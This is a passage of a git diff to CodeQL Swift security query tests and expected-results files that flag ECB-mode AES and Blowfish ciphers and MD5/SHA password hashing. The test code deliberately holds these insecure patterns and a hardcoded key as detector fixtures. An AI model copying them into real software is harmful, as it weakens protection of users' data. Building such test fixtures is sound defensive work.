test.swift:39:9:39:13 | call to ECB.init() | test.swift:60:37:60:53 | call to getECBBlockMode() | The initialization of the cipher 'call to getECBBlockMode()' uses the insecure ECB block mode from $@. | test.swift:39:9:39:13 | call to ECB.init() | call to ECB.init() | +| test.swift:61:37:61:53 | call to getECBBlockMode() | test.swift:39:9:39:13 | call to ECB.init() | test.swift:61:37:61:53 | call to getECBBlockMode() | The initialization of the cipher 'call to getECBBlockMode()' uses the insecure ECB block mode from $@. 
| test.swift:39:9:39:13 | call to ECB.init() | call to ECB.init() | +| test.swift:71:42:71:42 | ecb | test.swift:50:12:50:16 | call to ECB.init() | test.swift:71:42:71:42 | ecb | The initialization of the cipher 'ecb' uses the insecure ECB block mode from $@. | test.swift:50:12:50:16 | call to ECB.init() | call to ECB.init() | +| test.swift:72:42:72:46 | call to ECB.init() | test.swift:72:42:72:46 | call to ECB.init() | test.swift:72:42:72:46 | call to ECB.init() | The initialization of the cipher 'call to ECB.init()' uses the insecure ECB block mode from $@. | test.swift:72:42:72:46 | call to ECB.init() | call to ECB.init() | +| test.swift:73:42:73:58 | call to getECBBlockMode() | test.swift:39:9:39:13 | call to ECB.init() | test.swift:73:42:73:58 | call to getECBBlockMode() | The initialization of the cipher 'call to getECBBlockMode()' uses the insecure ECB block mode from $@. | test.swift:39:9:39:13 | call to ECB.init() | call to ECB.init() | edges | test.swift:39:9:39:13 | call to ECB.init() | test.swift:60:37:60:53 | call to getECBBlockMode() | provenance | | | test.swift:39:9:39:13 | call to ECB.init() | test.swift:61:37:61:53 | call to getECBBlockMode() | provenance | | 
@@ -18,13 +28,3 @@ nodes | test.swift:72:42:72:46 | call to ECB.init() | semmle.label | call to ECB.init() | | test.swift:73:42:73:58 | call to getECBBlockMode() | semmle.label | call to getECBBlockMode() | subpaths -#select -| test.swift:56:37:56:37 | ecb | test.swift:50:12:50:16 | call to ECB.init() | test.swift:56:37:56:37 | ecb | The initialization of the cipher 'ecb' uses the insecure ECB block mode from $@. | test.swift:50:12:50:16 | call to ECB.init() | call to ECB.init() | -| test.swift:57:37:57:37 | ecb | test.swift:50:12:50:16 | call to ECB.init() | test.swift:57:37:57:37 | ecb | The initialization of the cipher 'ecb' uses the insecure ECB block mode from $@. | test.swift:50:12:50:16 | call to ECB.init() | call to ECB.init() | -| test.swift:58:37:58:41 | call to ECB.init() | test.swift:58:37:58:41 | call to ECB.init() | test.swift:58:37:58:41 | call to ECB.init() | The initialization of the cipher 'call to ECB.init()' uses the insecure ECB block mode from $@. | test.swift:58:37:58:41 | call to ECB.init() | call to ECB.init() | -| test.swift:59:37:59:41 | call to ECB.init() | test.swift:59:37:59:41 | call to ECB.init() | test.swift:59:37:59:41 | call to ECB.init() | The initialization of the cipher 'call to ECB.init()' uses the insecure ECB block mode from $@. | test.swift:59:37:59:41 | call to ECB.init() | call to ECB.init() | -| test.swift:60:37:60:53 | call to getECBBlockMode() | test.swift:39:9:39:13 | call to ECB.init() | test.swift:60:37:60:53 | call to getECBBlockMode() | The initialization of the cipher 'call to getECBBlockMode()' uses the insecure ECB block mode from $@. | test.swift:39:9:39:13 | call to ECB.init() | call to ECB.init() | -| test.swift:61:37:61:53 | call to getECBBlockMode() | test.swift:39:9:39:13 | call to ECB.init() | test.swift:61:37:61:53 | call to getECBBlockMode() | The initialization of the cipher 'call to getECBBlockMode()' uses the insecure ECB block mode from $@. 
| test.swift:39:9:39:13 | call to ECB.init() | call to ECB.init() | -| test.swift:71:42:71:42 | ecb | test.swift:50:12:50:16 | call to ECB.init() | test.swift:71:42:71:42 | ecb | The initialization of the cipher 'ecb' uses the insecure ECB block mode from $@. | test.swift:50:12:50:16 | call to ECB.init() | call to ECB.init() | -| test.swift:72:42:72:46 | call to ECB.init() | test.swift:72:42:72:46 | call to ECB.init() | test.swift:72:42:72:46 | call to ECB.init() | The initialization of the cipher 'call to ECB.init()' uses the insecure ECB block mode from $@. | test.swift:72:42:72:46 | call to ECB.init() | call to ECB.init() | -| test.swift:73:42:73:58 | call to getECBBlockMode() | test.swift:39:9:39:13 | call to ECB.init() | test.swift:73:42:73:58 | call to getECBBlockMode() | The initialization of the cipher 'call to getECBBlockMode()' uses the insecure ECB block mode from $@. | test.swift:39:9:39:13 | call to ECB.init() | call to ECB.init() | diff --git a/swift/ql/test/query-tests/Security/CWE-327/ECBEncryption.qlref b/swift/ql/test/query-tests/Security/CWE-327/ECBEncryption.qlref index ac56a6338b0f..bee507b1cd09 100644 --- a/swift/ql/test/query-tests/Security/CWE-327/ECBEncryption.qlref +++ b/swift/ql/test/query-tests/Security/CWE-327/ECBEncryption.qlref @@ -1 +1,2 @@ -queries/Security/CWE-327/ECBEncryption.ql \ No newline at end of file +query: queries/Security/CWE-327/ECBEncryption.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/swift/ql/test/query-tests/Security/CWE-327/test.swift b/swift/ql/test/query-tests/Security/CWE-327/test.swift index 382269905612..45e288a2e59d 100644 --- a/swift/ql/test/query-tests/Security/CWE-327/test.swift +++ b/swift/ql/test/query-tests/Security/CWE-327/test.swift @@ -36,7 +36,7 @@ func getRandomArray() -> Array { } func getECBBlockMode() -> BlockMode { - return ECB() + return ECB() // $ Source } func getCBCBlockMode() -> BlockMode { 
@@ -47,18 +47,18 @@ func getCBCBlockMode() -> BlockMode { func test1() { let key: Array = [0x2a, 0x3a, 0x80, 0x05, 0xaf, 0x46, 0x58, 0x2d, 0x66, 0x52, 0x10, 0xae, 0x86, 0xd3, 0x8e, 0x8f] - let ecb = ECB() + let ecb = ECB() // $ Source let iv = getRandomArray() let cbc = CBC(iv: iv) let padding = Padding.noPadding // AES test cases - let ab1 = AES(key: key, blockMode: ecb, padding: padding) // BAD - let ab2 = AES(key: key, blockMode: ecb) // BAD - let ab3 = AES(key: key, blockMode: ECB(), padding: padding) // BAD - let ab4 = AES(key: key, blockMode: ECB()) // BAD - let ab5 = AES(key: key, blockMode: getECBBlockMode(), padding: padding) // BAD - let ab6 = AES(key: key, blockMode: getECBBlockMode()) // BAD + let ab1 = AES(key: key, blockMode: ecb, padding: padding) // BAD // $ Alert + let ab2 = AES(key: key, blockMode: ecb) // BAD // $ Alert + let ab3 = AES(key: key, blockMode: ECB(), padding: padding) // BAD // $ Alert + let ab4 = AES(key: key, blockMode: ECB()) // BAD // $ Alert + let ab5 = AES(key: key, blockMode: getECBBlockMode(), padding: padding) // BAD // $ Alert + let ab6 = AES(key: key, blockMode: getECBBlockMode()) // BAD // $ Alert let ag1 = AES(key: key, blockMode: cbc, padding: padding) // GOOD let ag2 = AES(key: key, blockMode: cbc) // GOOD 
@@ -68,9 +68,9 @@ func test1() { let ag6 = AES(key: key, blockMode: getCBCBlockMode()) // GOOD // Blowfish test cases - let bb1 = Blowfish(key: key, blockMode: ecb, padding: padding) // BAD - let bb2 = Blowfish(key: key, blockMode: ECB(), padding: padding) // BAD - let bb3 = Blowfish(key: key, blockMode: getECBBlockMode(), padding: padding) // BAD + let bb1 = Blowfish(key: key, blockMode: ecb, padding: padding) // BAD // $ Alert + let bb2 = Blowfish(key: key, blockMode: ECB(), padding: padding) // BAD // $ Alert + let bb3 = Blowfish(key: key, blockMode: getECBBlockMode(), padding: padding) // BAD // $ Alert let bg1 = Blowfish(key: key, blockMode: cbc, padding: padding) // GOOD let bg2 = Blowfish(key: key, blockMode: CBC(iv: iv), padding: padding) // GOOD diff --git a/swift/ql/test/query-tests/Security/CWE-328/WeakPasswordHashing.expected b/swift/ql/test/query-tests/Security/CWE-328/WeakPasswordHashing.expected index 273f26164fd7..2b0eed8d0c2b 100644 --- a/swift/ql/test/query-tests/Security/CWE-328/WeakPasswordHashing.expected +++ b/swift/ql/test/query-tests/Security/CWE-328/WeakPasswordHashing.expected 
@@ -1,3 +1,52 @@ +#select +| testCryptoKit.swift:84:47:84:47 | passwd | testCryptoKit.swift:84:47:84:47 | passwd | testCryptoKit.swift:84:47:84:47 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:84:47:84:47 | passwd | password (passwd) | +| testCryptoKit.swift:85:52:85:52 | passwd | testCryptoKit.swift:85:52:85:52 | passwd | testCryptoKit.swift:85:52:85:52 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:85:52:85:52 | passwd | password (passwd) | +| testCryptoKit.swift:91:36:91:36 | passwd | testCryptoKit.swift:91:36:91:36 | passwd | testCryptoKit.swift:91:36:91:36 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:91:36:91:36 | passwd | password (passwd) | +| testCryptoKit.swift:92:45:92:45 | passwd | testCryptoKit.swift:92:45:92:45 | passwd | testCryptoKit.swift:92:45:92:45 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:92:45:92:45 | passwd | password (passwd) | +| testCryptoKit.swift:98:44:98:44 | passwd | testCryptoKit.swift:98:44:98:44 | passwd | testCryptoKit.swift:98:44:98:44 | passwd | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:98:44:98:44 | passwd | password (passwd) | +| testCryptoKit.swift:99:53:99:53 | passwd | testCryptoKit.swift:99:53:99:53 | passwd | testCryptoKit.swift:99:53:99:53 | passwd | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:99:53:99:53 | passwd | password (passwd) | +| testCryptoKit.swift:105:37:105:37 | passwd | testCryptoKit.swift:105:37:105:37 | passwd | testCryptoKit.swift:105:37:105:37 | passwd | Insecure hashing algorithm (SHA256) depends on $@. | testCryptoKit.swift:105:37:105:37 | passwd | password (passwd) | +| testCryptoKit.swift:106:46:106:46 | passwd | testCryptoKit.swift:106:46:106:46 | passwd | testCryptoKit.swift:106:46:106:46 | passwd | Insecure hashing algorithm (SHA256) depends on $@. 
| testCryptoKit.swift:106:46:106:46 | passwd | password (passwd) | +| testCryptoKit.swift:112:37:112:37 | passwd | testCryptoKit.swift:112:37:112:37 | passwd | testCryptoKit.swift:112:37:112:37 | passwd | Insecure hashing algorithm (SHA384) depends on $@. | testCryptoKit.swift:112:37:112:37 | passwd | password (passwd) | +| testCryptoKit.swift:113:46:113:46 | passwd | testCryptoKit.swift:113:46:113:46 | passwd | testCryptoKit.swift:113:46:113:46 | passwd | Insecure hashing algorithm (SHA384) depends on $@. | testCryptoKit.swift:113:46:113:46 | passwd | password (passwd) | +| testCryptoKit.swift:119:37:119:37 | passwd | testCryptoKit.swift:119:37:119:37 | passwd | testCryptoKit.swift:119:37:119:37 | passwd | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:119:37:119:37 | passwd | password (passwd) | +| testCryptoKit.swift:120:46:120:46 | passwd | testCryptoKit.swift:120:46:120:46 | passwd | testCryptoKit.swift:120:46:120:46 | passwd | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:120:46:120:46 | passwd | password (passwd) | +| testCryptoKit.swift:129:23:129:23 | passwd | testCryptoKit.swift:129:23:129:23 | passwd | testCryptoKit.swift:129:23:129:23 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:129:23:129:23 | passwd | password (passwd) | +| testCryptoKit.swift:138:23:138:23 | passwd | testCryptoKit.swift:138:23:138:23 | passwd | testCryptoKit.swift:138:23:138:23 | passwd | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:138:23:138:23 | passwd | password (passwd) | +| testCryptoKit.swift:147:23:147:23 | passwd | testCryptoKit.swift:147:23:147:23 | passwd | testCryptoKit.swift:147:23:147:23 | passwd | Insecure hashing algorithm (SHA256) depends on $@. 
| testCryptoKit.swift:147:23:147:23 | passwd | password (passwd) | +| testCryptoKit.swift:156:23:156:23 | passwd | testCryptoKit.swift:156:23:156:23 | passwd | testCryptoKit.swift:156:23:156:23 | passwd | Insecure hashing algorithm (SHA384) depends on $@. | testCryptoKit.swift:156:23:156:23 | passwd | password (passwd) | +| testCryptoKit.swift:165:23:165:23 | passwd | testCryptoKit.swift:165:23:165:23 | passwd | testCryptoKit.swift:165:23:165:23 | passwd | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:165:23:165:23 | passwd | password (passwd) | +| testCryptoKit.swift:174:32:174:32 | passwd | testCryptoKit.swift:174:32:174:32 | passwd | testCryptoKit.swift:174:32:174:32 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:174:32:174:32 | passwd | password (passwd) | +| testCryptoKit.swift:183:32:183:32 | passwd | testCryptoKit.swift:183:32:183:32 | passwd | testCryptoKit.swift:183:32:183:32 | passwd | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:183:32:183:32 | passwd | password (passwd) | +| testCryptoKit.swift:192:32:192:32 | passwd | testCryptoKit.swift:192:32:192:32 | passwd | testCryptoKit.swift:192:32:192:32 | passwd | Insecure hashing algorithm (SHA256) depends on $@. | testCryptoKit.swift:192:32:192:32 | passwd | password (passwd) | +| testCryptoKit.swift:201:32:201:32 | passwd | testCryptoKit.swift:201:32:201:32 | passwd | testCryptoKit.swift:201:32:201:32 | passwd | Insecure hashing algorithm (SHA384) depends on $@. | testCryptoKit.swift:201:32:201:32 | passwd | password (passwd) | +| testCryptoKit.swift:210:32:210:32 | passwd | testCryptoKit.swift:210:32:210:32 | passwd | testCryptoKit.swift:210:32:210:32 | passwd | Insecure hashing algorithm (SHA512) depends on $@. 
| testCryptoKit.swift:210:32:210:32 | passwd | password (passwd) | +| testCryptoKit.swift:220:49:220:49 | passwordData | testCryptoKit.swift:220:49:220:49 | passwordData | testCryptoKit.swift:220:49:220:49 | passwordData | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:220:49:220:49 | passwordData | password (passwordData) | +| testCryptoKit.swift:224:33:224:57 | call to Data.init(_:) | testCryptoKit.swift:224:38:224:38 | passwordString | testCryptoKit.swift:224:33:224:57 | call to Data.init(_:) | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:224:38:224:38 | passwordString | password (passwordString) | +| testCryptoSwift.swift:154:30:154:30 | passwdArray | testCryptoSwift.swift:154:30:154:30 | passwdArray | testCryptoSwift.swift:154:30:154:30 | passwdArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:154:30:154:30 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:157:31:157:31 | passwdArray | testCryptoSwift.swift:157:31:157:31 | passwdArray | testCryptoSwift.swift:157:31:157:31 | passwdArray | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:157:31:157:31 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:160:47:160:47 | passwdArray | testCryptoSwift.swift:160:47:160:47 | passwdArray | testCryptoSwift.swift:160:47:160:47 | passwdArray | Insecure hashing algorithm (SHA2) depends on $@. | testCryptoSwift.swift:160:47:160:47 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:163:47:163:47 | passwdArray | testCryptoSwift.swift:163:47:163:47 | passwdArray | testCryptoSwift.swift:163:47:163:47 | passwdArray | Insecure hashing algorithm (SHA2) depends on $@. 
| testCryptoSwift.swift:163:47:163:47 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:167:20:167:20 | passwdArray | testCryptoSwift.swift:167:20:167:20 | passwdArray | testCryptoSwift.swift:167:20:167:20 | passwdArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:167:20:167:20 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:170:21:170:21 | passwdArray | testCryptoSwift.swift:170:21:170:21 | passwdArray | testCryptoSwift.swift:170:21:170:21 | passwdArray | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:170:21:170:21 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:173:23:173:23 | passwdArray | testCryptoSwift.swift:173:23:173:23 | passwdArray | testCryptoSwift.swift:173:23:173:23 | passwdArray | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoSwift.swift:173:23:173:23 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:176:21:176:21 | passwdArray | testCryptoSwift.swift:176:21:176:21 | passwdArray | testCryptoSwift.swift:176:21:176:21 | passwdArray | Insecure hashing algorithm (SHA2) depends on $@. | testCryptoSwift.swift:176:21:176:21 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:179:21:179:21 | passwdArray | testCryptoSwift.swift:179:21:179:21 | passwdArray | testCryptoSwift.swift:179:21:179:21 | passwdArray | Insecure hashing algorithm (SHA3) depends on $@. | testCryptoSwift.swift:179:21:179:21 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:183:9:183:9 | passwdArray | testCryptoSwift.swift:183:9:183:9 | passwdArray | testCryptoSwift.swift:183:9:183:9 | passwdArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:183:9:183:9 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:186:9:186:9 | passwdArray | testCryptoSwift.swift:186:9:186:9 | passwdArray | testCryptoSwift.swift:186:9:186:9 | passwdArray | Insecure hashing algorithm (SHA1) depends on $@. 
| testCryptoSwift.swift:186:9:186:9 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:189:9:189:9 | passwdArray | testCryptoSwift.swift:189:9:189:9 | passwdArray | testCryptoSwift.swift:189:9:189:9 | passwdArray | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoSwift.swift:189:9:189:9 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:192:9:192:9 | passwdArray | testCryptoSwift.swift:192:9:192:9 | passwdArray | testCryptoSwift.swift:192:9:192:9 | passwdArray | Insecure hashing algorithm (SHA2) depends on $@. | testCryptoSwift.swift:192:9:192:9 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:195:9:195:9 | passwdArray | testCryptoSwift.swift:195:9:195:9 | passwdArray | testCryptoSwift.swift:195:9:195:9 | passwdArray | Insecure hashing algorithm (SHA3) depends on $@. | testCryptoSwift.swift:195:9:195:9 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:201:9:201:9 | passwdData | testCryptoSwift.swift:201:9:201:9 | passwdData | testCryptoSwift.swift:201:9:201:9 | passwdData | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:201:9:201:9 | passwdData | password (passwdData) | +| testCryptoSwift.swift:204:9:204:9 | passwdData | testCryptoSwift.swift:204:9:204:9 | passwdData | testCryptoSwift.swift:204:9:204:9 | passwdData | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:204:9:204:9 | passwdData | password (passwdData) | +| testCryptoSwift.swift:207:9:207:9 | passwdData | testCryptoSwift.swift:207:9:207:9 | passwdData | testCryptoSwift.swift:207:9:207:9 | passwdData | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoSwift.swift:207:9:207:9 | passwdData | password (passwdData) | +| testCryptoSwift.swift:210:9:210:9 | passwdData | testCryptoSwift.swift:210:9:210:9 | passwdData | testCryptoSwift.swift:210:9:210:9 | passwdData | Insecure hashing algorithm (SHA2) depends on $@. 
| testCryptoSwift.swift:210:9:210:9 | passwdData | password (passwdData) | +| testCryptoSwift.swift:213:9:213:9 | passwdData | testCryptoSwift.swift:213:9:213:9 | passwdData | testCryptoSwift.swift:213:9:213:9 | passwdData | Insecure hashing algorithm (SHA3) depends on $@. | testCryptoSwift.swift:213:9:213:9 | passwdData | password (passwdData) | +| testCryptoSwift.swift:219:9:219:9 | passwd | testCryptoSwift.swift:219:9:219:9 | passwd | testCryptoSwift.swift:219:9:219:9 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:219:9:219:9 | passwd | password (passwd) | +| testCryptoSwift.swift:222:9:222:9 | passwd | testCryptoSwift.swift:222:9:222:9 | passwd | testCryptoSwift.swift:222:9:222:9 | passwd | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:222:9:222:9 | passwd | password (passwd) | +| testCryptoSwift.swift:225:9:225:9 | passwd | testCryptoSwift.swift:225:9:225:9 | passwd | testCryptoSwift.swift:225:9:225:9 | passwd | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoSwift.swift:225:9:225:9 | passwd | password (passwd) | +| testCryptoSwift.swift:228:9:228:9 | passwd | testCryptoSwift.swift:228:9:228:9 | passwd | testCryptoSwift.swift:228:9:228:9 | passwd | Insecure hashing algorithm (SHA2) depends on $@. | testCryptoSwift.swift:228:9:228:9 | passwd | password (passwd) | +| testCryptoSwift.swift:231:9:231:9 | passwd | testCryptoSwift.swift:231:9:231:9 | passwd | testCryptoSwift.swift:231:9:231:9 | passwd | Insecure hashing algorithm (SHA3) depends on $@. | testCryptoSwift.swift:231:9:231:9 | passwd | password (passwd) | edges | testCryptoKit.swift:224:38:224:38 | passwordString | testCryptoKit.swift:224:38:224:53 | .utf8 | provenance | | | testCryptoKit.swift:224:38:224:53 | .utf8 | testCryptoKit.swift:224:33:224:57 | call to Data.init(_:) | provenance | | 
@@ -53,52 +102,3 @@ nodes | testCryptoSwift.swift:228:9:228:9 | passwd | semmle.label | passwd | | testCryptoSwift.swift:231:9:231:9 | passwd | semmle.label | passwd | subpaths -#select -| testCryptoKit.swift:84:47:84:47 | passwd | testCryptoKit.swift:84:47:84:47 | passwd | testCryptoKit.swift:84:47:84:47 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:84:47:84:47 | passwd | password (passwd) | -| testCryptoKit.swift:85:52:85:52 | passwd | testCryptoKit.swift:85:52:85:52 | passwd | testCryptoKit.swift:85:52:85:52 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:85:52:85:52 | passwd | password (passwd) | -| testCryptoKit.swift:91:36:91:36 | passwd | testCryptoKit.swift:91:36:91:36 | passwd | testCryptoKit.swift:91:36:91:36 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:91:36:91:36 | passwd | password (passwd) | -| testCryptoKit.swift:92:45:92:45 | passwd | testCryptoKit.swift:92:45:92:45 | passwd | testCryptoKit.swift:92:45:92:45 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:92:45:92:45 | passwd | password (passwd) | -| testCryptoKit.swift:98:44:98:44 | passwd | testCryptoKit.swift:98:44:98:44 | passwd | testCryptoKit.swift:98:44:98:44 | passwd | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:98:44:98:44 | passwd | password (passwd) | -| testCryptoKit.swift:99:53:99:53 | passwd | testCryptoKit.swift:99:53:99:53 | passwd | testCryptoKit.swift:99:53:99:53 | passwd | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:99:53:99:53 | passwd | password (passwd) | -| testCryptoKit.swift:105:37:105:37 | passwd | testCryptoKit.swift:105:37:105:37 | passwd | testCryptoKit.swift:105:37:105:37 | passwd | Insecure hashing algorithm (SHA256) depends on $@. 
| testCryptoKit.swift:105:37:105:37 | passwd | password (passwd) | -| testCryptoKit.swift:106:46:106:46 | passwd | testCryptoKit.swift:106:46:106:46 | passwd | testCryptoKit.swift:106:46:106:46 | passwd | Insecure hashing algorithm (SHA256) depends on $@. | testCryptoKit.swift:106:46:106:46 | passwd | password (passwd) | -| testCryptoKit.swift:112:37:112:37 | passwd | testCryptoKit.swift:112:37:112:37 | passwd | testCryptoKit.swift:112:37:112:37 | passwd | Insecure hashing algorithm (SHA384) depends on $@. | testCryptoKit.swift:112:37:112:37 | passwd | password (passwd) | -| testCryptoKit.swift:113:46:113:46 | passwd | testCryptoKit.swift:113:46:113:46 | passwd | testCryptoKit.swift:113:46:113:46 | passwd | Insecure hashing algorithm (SHA384) depends on $@. | testCryptoKit.swift:113:46:113:46 | passwd | password (passwd) | -| testCryptoKit.swift:119:37:119:37 | passwd | testCryptoKit.swift:119:37:119:37 | passwd | testCryptoKit.swift:119:37:119:37 | passwd | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:119:37:119:37 | passwd | password (passwd) | -| testCryptoKit.swift:120:46:120:46 | passwd | testCryptoKit.swift:120:46:120:46 | passwd | testCryptoKit.swift:120:46:120:46 | passwd | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:120:46:120:46 | passwd | password (passwd) | -| testCryptoKit.swift:129:23:129:23 | passwd | testCryptoKit.swift:129:23:129:23 | passwd | testCryptoKit.swift:129:23:129:23 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:129:23:129:23 | passwd | password (passwd) | -| testCryptoKit.swift:138:23:138:23 | passwd | testCryptoKit.swift:138:23:138:23 | passwd | testCryptoKit.swift:138:23:138:23 | passwd | Insecure hashing algorithm (SHA1) depends on $@. 
| testCryptoKit.swift:138:23:138:23 | passwd | password (passwd) | -| testCryptoKit.swift:147:23:147:23 | passwd | testCryptoKit.swift:147:23:147:23 | passwd | testCryptoKit.swift:147:23:147:23 | passwd | Insecure hashing algorithm (SHA256) depends on $@. | testCryptoKit.swift:147:23:147:23 | passwd | password (passwd) | -| testCryptoKit.swift:156:23:156:23 | passwd | testCryptoKit.swift:156:23:156:23 | passwd | testCryptoKit.swift:156:23:156:23 | passwd | Insecure hashing algorithm (SHA384) depends on $@. | testCryptoKit.swift:156:23:156:23 | passwd | password (passwd) | -| testCryptoKit.swift:165:23:165:23 | passwd | testCryptoKit.swift:165:23:165:23 | passwd | testCryptoKit.swift:165:23:165:23 | passwd | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:165:23:165:23 | passwd | password (passwd) | -| testCryptoKit.swift:174:32:174:32 | passwd | testCryptoKit.swift:174:32:174:32 | passwd | testCryptoKit.swift:174:32:174:32 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:174:32:174:32 | passwd | password (passwd) | -| testCryptoKit.swift:183:32:183:32 | passwd | testCryptoKit.swift:183:32:183:32 | passwd | testCryptoKit.swift:183:32:183:32 | passwd | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:183:32:183:32 | passwd | password (passwd) | -| testCryptoKit.swift:192:32:192:32 | passwd | testCryptoKit.swift:192:32:192:32 | passwd | testCryptoKit.swift:192:32:192:32 | passwd | Insecure hashing algorithm (SHA256) depends on $@. | testCryptoKit.swift:192:32:192:32 | passwd | password (passwd) | -| testCryptoKit.swift:201:32:201:32 | passwd | testCryptoKit.swift:201:32:201:32 | passwd | testCryptoKit.swift:201:32:201:32 | passwd | Insecure hashing algorithm (SHA384) depends on $@. 
| testCryptoKit.swift:201:32:201:32 | passwd | password (passwd) | -| testCryptoKit.swift:210:32:210:32 | passwd | testCryptoKit.swift:210:32:210:32 | passwd | testCryptoKit.swift:210:32:210:32 | passwd | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:210:32:210:32 | passwd | password (passwd) | -| testCryptoKit.swift:220:49:220:49 | passwordData | testCryptoKit.swift:220:49:220:49 | passwordData | testCryptoKit.swift:220:49:220:49 | passwordData | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:220:49:220:49 | passwordData | password (passwordData) | -| testCryptoKit.swift:224:33:224:57 | call to Data.init(_:) | testCryptoKit.swift:224:38:224:38 | passwordString | testCryptoKit.swift:224:33:224:57 | call to Data.init(_:) | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:224:38:224:38 | passwordString | password (passwordString) | -| testCryptoSwift.swift:154:30:154:30 | passwdArray | testCryptoSwift.swift:154:30:154:30 | passwdArray | testCryptoSwift.swift:154:30:154:30 | passwdArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:154:30:154:30 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:157:31:157:31 | passwdArray | testCryptoSwift.swift:157:31:157:31 | passwdArray | testCryptoSwift.swift:157:31:157:31 | passwdArray | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:157:31:157:31 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:160:47:160:47 | passwdArray | testCryptoSwift.swift:160:47:160:47 | passwdArray | testCryptoSwift.swift:160:47:160:47 | passwdArray | Insecure hashing algorithm (SHA2) depends on $@. | testCryptoSwift.swift:160:47:160:47 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:163:47:163:47 | passwdArray | testCryptoSwift.swift:163:47:163:47 | passwdArray | testCryptoSwift.swift:163:47:163:47 | passwdArray | Insecure hashing algorithm (SHA2) depends on $@. 
| testCryptoSwift.swift:163:47:163:47 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:167:20:167:20 | passwdArray | testCryptoSwift.swift:167:20:167:20 | passwdArray | testCryptoSwift.swift:167:20:167:20 | passwdArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:167:20:167:20 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:170:21:170:21 | passwdArray | testCryptoSwift.swift:170:21:170:21 | passwdArray | testCryptoSwift.swift:170:21:170:21 | passwdArray | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:170:21:170:21 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:173:23:173:23 | passwdArray | testCryptoSwift.swift:173:23:173:23 | passwdArray | testCryptoSwift.swift:173:23:173:23 | passwdArray | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoSwift.swift:173:23:173:23 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:176:21:176:21 | passwdArray | testCryptoSwift.swift:176:21:176:21 | passwdArray | testCryptoSwift.swift:176:21:176:21 | passwdArray | Insecure hashing algorithm (SHA2) depends on $@. | testCryptoSwift.swift:176:21:176:21 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:179:21:179:21 | passwdArray | testCryptoSwift.swift:179:21:179:21 | passwdArray | testCryptoSwift.swift:179:21:179:21 | passwdArray | Insecure hashing algorithm (SHA3) depends on $@. | 